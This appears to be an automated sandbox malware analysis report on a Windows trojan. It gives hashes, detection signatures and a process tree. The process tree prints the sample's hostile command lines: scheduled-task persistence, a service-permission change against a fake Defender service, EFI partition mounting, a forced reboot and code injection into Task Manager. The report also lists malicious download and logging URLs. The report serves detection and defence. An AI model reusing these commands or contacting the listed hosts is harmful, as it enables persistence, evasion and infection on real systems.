
Windows Analysis Report 0NlSa5bf55

Overview

General Information

Sample Name: 0NlSa5bf55 (renamed file extension from none to exe)
Analysis ID: 515565
MD5: ee30d6928c9de84049aa055417cc767e
SHA1: a2aec2076bdfa92e5cda03443bec7b6c3287b43a
SHA256: 0ab024b0da0436fddc99679a74a26fdcd9851eb00e88ff2998f001ccd0c9016f
Tags: 32, exe, trojan

Detection

Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Metasploit Payload
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sigma detected: System File Execution Location Anomaly
Found Tor onion address
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses shutdown.exe to shutdown or reboot the system
May modify the system service descriptor table (often done to hook functions)
Machine Learning detection for dropped file
Contains functionality to inject threads in other processes
Performs DNS TXT record lookups
Sigma detected: Suspicious Service DACL Modification
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Enables security privileges
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • 0NlSa5bf55.exe (PID: 2956 cmdline: "C:\Users\user\Desktop\0NlSa5bf55.exe" MD5: EE30D6928C9DE84049AA055417CC767E)
    • conhost.exe (PID: 2700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • upd.exe (PID: 5716 cmdline: C:\Users\user\Desktop\upd.exe -update MD5: 3C3046F640F7825C720849AAA809C963)
      • upd.exe (PID: 1304 cmdline: "C:\Users\user\Desktop\upd.exe" -update MD5: 3C3046F640F7825C720849AAA809C963)
        • csrss.exe (PID: 464 cmdline: C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe MD5: 3C3046F640F7825C720849AAA809C963)
          • schtasks.exe (PID: 4644 cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
            • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 5916 cmdline: schtasks /delete /tn ScheduledUpdate /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
            • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • mountvol.exe (PID: 6396 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)
            • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • mountvol.exe (PID: 1312 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)
            • conhost.exe (PID: 4632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • mountvol.exe (PID: 60 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)
            • conhost.exe (PID: 5168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • mountvol.exe (PID: 2056 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)
            • conhost.exe (PID: 6280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • shutdown.exe (PID: 6772 cmdline: shutdown -r -t 5 MD5: E2EB9CC0FE26E28406FB6F82F8E81B26)
            • conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • injector.exe (PID: 6592 cmdline: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll MD5: D98E33B66343E7C96158444127A117F6)
            • conhost.exe (PID: 4640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • windefender.exe (PID: 4940 cmdline: C:\Windows\windefender.exe MD5: E0A50C60A85BFBB9ECF45BFF0239AAA3)
            • conhost.exe (PID: 1460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • cmd.exe (PID: 4072 cmdline: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • sc.exe (PID: 5332 cmdline: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) MD5: 24A3E2603E63BCB9695A2935D3B24695)
  • svchost.exe (PID: 2008 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • TrustedInstaller.exe (PID: 5352 cmdline: C:\Windows\servicing\TrustedInstaller.exe MD5: 4578046C54A954C917BB393B70BA0AEB)
  • svchost.exe (PID: 6688 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3544 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6476 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • windefender.exe (PID: 6348 cmdline: C:\Windows\windefender.exe MD5: E0A50C60A85BFBB9ECF45BFF0239AAA3)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp
Rule: JoeSecurity_MetasploitPayload_3 (Yara detected Metasploit Payload; Author: Joe Security)

Source: 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp
Rule: JoeSecurity_MetasploitPayload_3 (Yara detected Metasploit Payload; Author: Joe Security)

Source: 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Rule: JoeSecurity_MetasploitPayload_3 (Yara detected Metasploit Payload; Author: Joe Security)

        Unpacked PEs

        Source: 5.2.upd.exe.9ad080.3.raw.unpack
        Rule: MAL_ME_RawDisk_Agent_Jan20_2 (Detects suspicious malware using ElRawDisk; Author: Florian Roth)
        Strings:
          • 0x3eb18:$s2: The Magic Word!
          • 0x4ac58:$s2: The Magic Word!
          • 0x3ee78:$s3: Software\Oracle\VirtualBox
          • 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73

        Source: 8.2.upd.exe.9af2e0.1.raw.unpack
        Rule: MAL_ME_RawDisk_Agent_Jan20_2 (Detects suspicious malware using ElRawDisk; Author: Florian Roth)
        Strings:
          • 0x3c8b8:$s2: The Magic Word!
          • 0x489f8:$s2: The Magic Word!
          • 0x3cc18:$s3: Software\Oracle\VirtualBox
          • 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73

        Source: 8.2.upd.exe.9a76e0.2.raw.unpack
        Rule: MAL_ME_RawDisk_Agent_Jan20_2 (Detects suspicious malware using ElRawDisk; Author: Florian Roth)
        Strings:
          • 0x444b8:$s2: The Magic Word!
          • 0x505f8:$s2: The Magic Word!
          • 0x44818:$s3: Software\Oracle\VirtualBox
          • 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73

        Source: 8.2.upd.exe.9ad080.3.raw.unpack
        Rule: MAL_ME_RawDisk_Agent_Jan20_2 (Detects suspicious malware using ElRawDisk; Author: Florian Roth)
        Strings:
          • 0x3eb18:$s2: The Magic Word!
          • 0x4ac58:$s2: The Magic Word!
          • 0x3ee78:$s3: Software\Oracle\VirtualBox
          • 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73

        Source: 11.2.csrss.exe.9ad080.2.raw.unpack
        Rule: MAL_ME_RawDisk_Agent_Jan20_2 (Detects suspicious malware using ElRawDisk; Author: Florian Roth)
        Strings:
          • 0x3eb18:$s2: The Magic Word!
          • 0x4ac58:$s2: The Magic Word!
          • 0x3ee78:$s3: Software\Oracle\VirtualBox
          • 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73

        (5 of 7 entries shown)

        Sigma Overview

        System Summary:

        Sigma detected: System File Execution Location Anomaly
        Source: Process started; Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community; Data: Command: C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe, CommandLine: C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe, CommandLine|base64offset|contains: ^j{, Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: "C:\Users\user\Desktop\upd.exe" -update, ParentImage: C:\Users\user\Desktop\upd.exe, ParentProcessId: 1304, ProcessCommandLine: C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe, ProcessId: 464
        Sigma detected: Suspicious Service DACL Modification
        Source: Process started; Author: Jonhnathan Ribeiro, oscd.community; Data: Command: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), CommandLine: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4072, ProcessCommandLine: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), ProcessId: 5332
        Sigma detected: Windows Processes Suspicious Parent Directory
        Source: Process started; Author: vburov; Data: Command: C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe, CommandLine: C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe, CommandLine|base64offset|contains: ^j{, Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: "C:\Users\user\Desktop\upd.exe" -update, ParentImage: C:\Users\user\Desktop\upd.exe, ParentProcessId: 1304, ProcessCommandLine: C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe, ProcessId: 464

        Persistence and Installation Behavior:

        Sigma detected: Schedule system process
        Source: Process started; Author: Joe Security; Data: Command: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, CommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe, ParentImage: C:\Windows\rss\csrss.exe, ParentProcessId: 464, ProcessCommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, ProcessId: 4644

        Jbx Signature Overview

        AV Detection:

        Multi AV Scanner detection for submitted file
        Source: 0NlSa5bf55.exe; Virustotal: Detection: 66%
        Source: 0NlSa5bf55.exe; ReversingLabs: Detection: 64%
        Antivirus detection for URL or domain
        Source: https://runmodes.com/api/logMachineGuidServiceVersionarch=64&build_number=17134&ec%3Af4%3Abb%3A86%3A; Avira URL Cloud: Label: malware
        Source: https://runmodes.com/api/log; Avira URL Cloud: Label: malware
        Source: https://runmodes.com/api/log442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.com; Avira URL Cloud: Label: malware
        Source: http://newscommer.com/app/app.exe; URL Reputation: Label: malware
        Source: https://runmodes.com/api/loginvalid; Avira URL Cloud: Label: malware
        Multi AV Scanner detection for domain / URL
        Source: runmodes.com; Virustotal: Detection: 6%
        Source: server16.trumops.com; Virustotal: Detection: 6%
        Source: gohnot.com; Virustotal: Detection: 10%
        Source: server2.trumops.com; Virustotal: Detection: 6%
        Antivirus detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe; Avira: detection malicious, Label: TR/Agent.twerk
        Source: C:\Users\user\Desktop\upd.exe; Avira: detection malicious, Label: TR/AD.GoCloudnet.vvvot
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll; Avira: detection malicious, Label: TR/Redcap.gsjan
        Source: C:\Windows\windefender.exe; Avira: detection malicious, Label: TR/Crypt.XPACK.eocey
        Source: C:\Windows\rss\csrss.exe; Avira: detection malicious, Label: TR/AD.GoCloudnet.vvvot
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll; Metadefender: Detection: 45%
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll; ReversingLabs: Detection: 59%
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe; Metadefender: Detection: 13%
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe; ReversingLabs: Detection: 73%
        Source: C:\Users\user\Desktop\upd.exe; Metadefender: Detection: 31%
        Source: C:\Users\user\Desktop\upd.exe; ReversingLabs: Detection: 85%
        Source: C:\Windows\rss\csrss.exe; Metadefender: Detection: 31%
        Source: C:\Windows\rss\csrss.exe; ReversingLabs: Detection: 85%
        Source: C:\Windows\windefender.exe; Metadefender: Detection: 28%
        Source: C:\Windows\windefender.exe; ReversingLabs: Detection: 78%
        Machine Learning detection for dropped file
        Source: C:\Users\user\Desktop\upd.exe; Joe Sandbox ML: detected
        Source: C:\Windows\rss\csrss.exe; Joe Sandbox ML: detected
        Source: 11.2.csrss.exe.11c38000.10.unpack; Avira: Label: TR/Patched.Ren.Gen
        Source: 11.2.csrss.exe.11bb8000.9.unpack; Avira: Label: TR/Patched.Ren.Gen
        Source: 0.3.0NlSa5bf55.exe.115f2000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
        Source: 0.3.0NlSa5bf55.exe.115f4000.3.unpack; Avira: Label: TR/Patched.Ren.Gen
        Source: 0.3.0NlSa5bf55.exe.115f6000.2.unpack; Avira: Label: TR/Patched.Ren.Gen
        Source: 0NlSa5bf55.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
        Source: Binary string: Loader.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp, bootx64.efi.11.dr
        Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: symsrv.pdb source: upd.exe, 00000005.00000002.321400821.0000000000C57000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.350292388.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.565483250.0000000000C57000.00000040.00020000.sdmp
        Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: '(.EfiGuardDxe.pdb source: upd.exe.0.dr
        Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: Unable to locate the .pdb file in this location source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: The module signature does not match with .pdb signature. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: .pdb.dbg source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: '(EfiGuardDxe.pdbx source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp, EfiGuardDxe.efi.11.dr
        Source: Binary string: symsrv.pdbGCTL source: upd.exe, 00000005.00000002.321400821.0000000000C57000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.350292388.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.565483250.0000000000C57000.00000040.00020000.sdmp
        Source: Binary string: or you do not have access permission to the .pdb location. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: EfiGuardDxe.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp, EfiGuardDxe.efi.11.dr
        Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: dbghelp.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: dbghelp.pdbGCTL source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe; Code function: 36_2_00007FF7019D5C10 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,

        Networking:

        Found Tor onion address
